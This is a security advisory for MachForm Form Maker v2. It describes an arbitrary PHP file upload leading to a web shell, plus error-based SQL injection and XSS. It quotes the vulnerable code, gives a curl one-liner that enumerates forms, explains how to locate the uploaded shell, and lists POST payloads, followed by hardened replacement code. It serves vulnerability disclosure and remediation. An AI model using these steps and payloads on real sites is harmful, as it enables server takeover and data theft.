########################################################
# Title: MachForm Form Maker - Multiple Vulnerabilities
# Author: Yashar Shahinzadeh
# Developer: http://www.appnitro.com
# Tested on: Linux & Windows, PHP 5.2.9
# Affected versions: 2
# Demonstration clip: http://y-shahinzadeh.ir/tutorial/machform.rar
########################################################

Abstract:
=========
1. Arbitrary File Upload
2. MySQL Injection (error based) and XSS


1. Arbitrary File Upload:
=========================

......
if (!empty($uploaded_files)) {
    foreach ($uploaded_files as $element_name) {
        if (empty($form_review)) {
            // move file and check for invalid file
            $destination_file = $input['machform_data_path'] . DATA_DIR . "/form_{$form_id}/files/{$element_name}-{$record_insert_id}-{$_FILES[$element_name]['name']}";
            if (move_uploaded_file($_FILES[$element_name]['tmp_name'], $destination_file)) {
                $filename = mysql_real_escape_string($_FILES[$element_name]['name']);
                $query = "update ap_form_{$form_id} set $element_name = '{$element_name}-{$record_insert_id}-{$filename}' where id = '$record_insert_id'";
                do_query($query);
            }
        } else {
            // for form with review enabled, append .tmp suffix to all uploaded files
            // move file and check for invalid file
            $destination_file = $input['machform_data_path'] . DATA_DIR . "/form_{$form_id}/files/{$element_name}-{$record_insert_id}-{$_FILES[$element_name]['name']}.tmp";
            if (move_uploaded_file($_FILES[$element_name]['tmp_name'], $destination_file)) {
                $filename = mysql_real_escape_string($_FILES[$element_name]['name']);
                $query = "update ap_form_{$form_id}_review set $element_name = '{$element_name}-{$record_insert_id}-{$filename}' where id = '$record_insert_id'";
                do_query($query);
            }
        }
        if (!empty($uploaded_file_lookup[$element_name])) {
            unset($uploaded_file_lookup[$element_name]);
        }
    }
......

Despite the comment "check for invalid file", nothing in this branch validates the upload. The client-supplied file name is used verbatim in $destination_file (mysql_real_escape_string() is only applied to the copy that goes into the query), no extension allow-list is enforced, and the file is written under the data directory, which is served by the web server. A .php file therefore lands at a predictable, web-reachable path and is executed when requested.

Test exploitation:

The attacker starts with view.php, located at the site root. Two lines in that file are the lead to both issues:

$input_array = ap_sanitize_input($_POST);
$submit_result = process_form($input_array);

These two calls are what lead to both the MySQL injection and the arbitrary file upload. Rather than audit the code further, I will just demonstrate the attack. It starts by brute-forcing the ID parameter of view.php to find a form that contains a file upload element. Any tool can do this; the Linux one-liner below fetches the first 500 forms in parallel and greps the responses for a file input:

seq 1 500 | xargs -I XX -P32 curl -s "http://target/view.php?id=XX" -o XX.out
grep 'type="file"' *.out

Next, the name of the HTML element that follows for="(.*)" in the form's source must be noted; the picture below gives a better idea:

http://blog.y-shahinzadeh.ir/posts-images/machform/7.jpg

All that remains is uploading a PHP shell and locating it on the server. Following $destination_file above, the file is written to:

http://target/data/form_[ID]/files/[element name]-[mysql_insert_id()]-[original filename]

In the URL above, [ID] is obtained in the brute-force phase, [element name] from the HTML source, and [original filename] is the name the attacker gave the shell; only [mysql_insert_id()], the id of the submission row, must be brute-forced again. Because this is relatively tricky, I recorded a clip demonstrating it:

http://y-shahinzadeh.ir/tutorial/machform.rar


2. MySQL Injection (error based) and XSS:
=========================================

......
$input_array = ap_sanitize_input($_POST);
......

Exploit (POST to view.php after finding the element names in the HTML):

element_1=1&element_2='&element_3=1&form_id=11&submit=1

element_1=1&element_2=%27%22%28%29%26%3cScRiPt%251%3eprompt%20%29%3c%2fScRiPt%3e&element_3=1&form_id=11&submit=Enviar

The first request puts a lone single quote into element_2; the value reaches the query unescaped and MySQL's syntax error is returned to the client (error based injection). The second request sends a script tag in the same field (XSS).
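The following is an added example, not MachForm's own code, showing how the upload branch quoted in section 1 should be written: the element name and extension are validated against allow-lists, the name on disk is chosen by the server, the data directory is assumed to sit outside the web root, and the UPDATE uses bound parameters. $form_id, $element_name, $record_insert_id, $input['machform_data_path'] and DATA_DIR are the names from the advisory's snippet; $mysqli (a mysqli connection), $allowed_extensions and the function name are assumptions made for this illustration.

```php
<?php
// Added example, not MachForm's own code: a hardened version of the upload
// branch quoted in section 1 of the advisory. $form_id, $element_name,
// $record_insert_id, $input['machform_data_path'] and DATA_DIR are the names
// used there; $mysqli, $allowed_extensions and this function name are
// assumptions made for this illustration.

function store_upload_safely(mysqli $mysqli, array $input, $form_id, $element_name,
                             $record_insert_id, array $allowed_extensions, $review = false)
{
    // Element names are fixed as element_<digits>; anything else never reaches
    // the filesystem path or the UPDATE statement below.
    if (!preg_match('/^element_[0-9]+$/', $element_name)) {
        return false;
    }
    $form_id          = (int) $form_id;
    $record_insert_id = (int) $record_insert_id;

    // PHP must report a successful upload, and the temp file must really be one.
    if (!isset($_FILES[$element_name]) || $_FILES[$element_name]['error'] !== UPLOAD_ERR_OK
        || !is_uploaded_file($_FILES[$element_name]['tmp_name'])) {
        return false;
    }

    // Only the extension of the client name is used, and only if it is on the
    // allow-list. basename() strips any directory components sent by the client.
    $client_name = basename($_FILES[$element_name]['name']);
    $ext = strtolower(pathinfo($client_name, PATHINFO_EXTENSION));
    if ($ext === '' || !in_array($ext, $allowed_extensions, true)) {
        return false;
    }

    // The name on disk is chosen by the server and is not guessable, so the
    // "brute-force mysql_insert_id()" step from the advisory no longer works.
    // openssl_random_pseudo_bytes() needs PHP >= 5.3; use random_bytes() on PHP 7+.
    $random      = bin2hex(openssl_random_pseudo_bytes(16));
    $stored_name = "{$element_name}-{$record_insert_id}-{$random}.{$ext}" . ($review ? '.tmp' : '');

    // Assumption: machform_data_path is configured outside the web root, so even
    // an over-broad allow-list cannot produce a URL that executes the file.
    $dir = rtrim($input['machform_data_path'], '/') . DATA_DIR . "/form_{$form_id}/files";
    if (!is_dir($dir) && !mkdir($dir, 0750, true)) {
        return false;
    }
    $destination_file = $dir . '/' . $stored_name;
    if (!move_uploaded_file($_FILES[$element_name]['tmp_name'], $destination_file)) {
        return false;
    }
    chmod($destination_file, 0640); // no execute bit, not world-readable

    // The column name was validated by the regex above; the value and the row id
    // are bound as parameters instead of being interpolated into the SQL.
    $table = 'ap_form_' . $form_id . ($review ? '_review' : '');
    $stmt  = $mysqli->prepare("UPDATE {$table} SET {$element_name} = ? WHERE id = ?");
    if (!$stmt) {
        error_log('prepare failed: ' . $mysqli->error); // never echo this to the client
        unlink($destination_file);
        return false;
    }
    $stmt->bind_param('si', $stored_name, $record_insert_id);
    $ok = $stmt->execute();
    $stmt->close();
    return $ok ? $stored_name : false;
}

// Usage, assuming the same loop as in the advisory's snippet:
// foreach ($uploaded_files as $element_name) {
//     store_upload_safely($mysqli, $input, $form_id, $element_name,
//                         $record_insert_id, array('pdf', 'png', 'jpg', 'jpeg'),
//                         !empty($form_review));
// }
```

The original name the client sent is deliberately not part of the path; if it must be shown to users later, store it in a separate column and encode it on output. Keeping the data directory outside the web root and serving files through a download script is what makes the extension allow-list a second line of defence rather than the only one.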
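For section 2, the following is an added example, not MachForm's own code, of how the submission INSERT and the later display of the values should be done: element names are restricted to element_<digits>, form_id is forced to an integer before it becomes part of the table name, every value is bound as a parameter, database errors are logged rather than echoed, and values are HTML-encoded at render time. ap_form_<id>, element_<n> and form_id come from the advisory; $mysqli, insert_submission() and render_value() are assumptions made for this illustration.

```php
<?php
// Added example, not MachForm's own code: the submission INSERT done with a
// prepared statement, plus HTML encoding at output time. ap_form_<id>,
// element_<n> and form_id come from section 2 of the advisory; $mysqli,
// insert_submission() and render_value() are assumptions for this illustration.

function insert_submission(mysqli $mysqli, $form_id, array $post)
{
    // form_id becomes part of the table name, so it is forced to an integer
    // rather than quoted or escaped.
    $form_id = (int) $form_id;

    $columns = array();
    $values  = array();
    foreach ($post as $name => $value) {
        // Only element_<digits> may become a column name. The submit button,
        // form_id and anything crafted by the client are dropped here.
        if (!preg_match('/^element_[0-9]+$/', $name)) {
            continue;
        }
        $columns[] = $name;
        $values[]  = (string) $value;
    }
    if (!$columns) {
        return false;
    }

    $placeholders = implode(', ', array_fill(0, count($values), '?'));
    $sql  = "INSERT INTO ap_form_{$form_id} (" . implode(', ', $columns) . ") VALUES ({$placeholders})";
    $stmt = $mysqli->prepare($sql);
    if (!$stmt) {
        // Logging instead of echoing $mysqli->error is what removes the
        // error based feedback channel the first PoC request relies on.
        error_log('prepare failed: ' . $mysqli->error);
        return false;
    }

    // Every value is bound as a string. A quote (element_2=') is then data,
    // not SQL, and the statement still succeeds.
    $types = str_repeat('s', count($values));
    $args  = array_merge(array($types), $values);
    $refs  = array();
    foreach ($args as $k => $v) {       // bind_param() requires references
        $refs[$k] = &$args[$k];
    }
    call_user_func_array(array($stmt, 'bind_param'), $refs);
    $ok = $stmt->execute();
    $stmt->close();
    return $ok ? $mysqli->insert_id : false;
}

// Output side: stored values are encoded when rendered, so the <ScRiPt> payload
// from the second PoC request is displayed literally instead of executed.
function render_value($value)
{
    return htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
}

// Usage with the first PoC request body from the advisory (constructed input):
// $post = array('element_1' => '1', 'element_2' => "'", 'element_3' => '1',
//               'form_id' => '11', 'submit' => '1');
// $id = insert_submission($mysqli, $post['form_id'], $post);
// echo render_value($post['element_2']);  // prints &#039;
```

Input sanitisation such as ap_sanitize_input() is not a substitute for either half of this: the query must be parameterised regardless of what was stripped on the way in, and encoding must happen at the point of output because the same value may be rendered in HTML, in an attribute, or in a download link.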